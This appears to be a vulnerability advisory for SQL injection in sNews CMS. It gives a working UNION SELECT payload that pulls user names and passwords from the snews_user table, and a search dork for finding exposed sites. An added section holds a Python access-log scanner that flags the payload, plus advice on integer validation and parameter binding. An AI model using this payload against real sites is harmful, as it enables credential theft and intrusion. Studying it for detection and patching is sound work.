Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL PoC:

/snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
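
Added example, not part of the original advisory: a log check that flags requests to `snews.php?act=shownews` whose `id` is not a plain integer, after undoing the URL-encoding and `/**/` comment padding used in the PoC above. The log lines, client addresses and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines in combined log format (sample data, not from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id='
    '-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6'
    '/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 812',
    '192.0.2.78 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=23%2527 HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\b.+\bselect\b")


def normalize(value):
    """Undo a second layer of URL-encoding and treat /**/ comments as whitespace."""
    value = unquote_plus(value)            # parse_qsl already decoded one layer
    value = INLINE_COMMENT_RE.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def suspicious_id(request_target):
    """Return the normalized id if a shownews request carries a non-integer id, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/snews.php"):
        return None
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if params.get("act") != "shownews" or "id" not in params:
        return None
    value = normalize(params["id"])
    return None if re.fullmatch(r"\d+", value) else value


def scan(lines):
    """Return (client, normalized_id, looks_like_union_select) for each flagged line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        value = suspicious_id(match.group(1)) if match else None
        if value is not None:
            hits.append((line.split()[0], value, bool(UNION_SELECT_RE.search(value))))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the fix on the application side: cast or validate `id` as an integer and bind it as a query parameter before it reaches the database.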

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*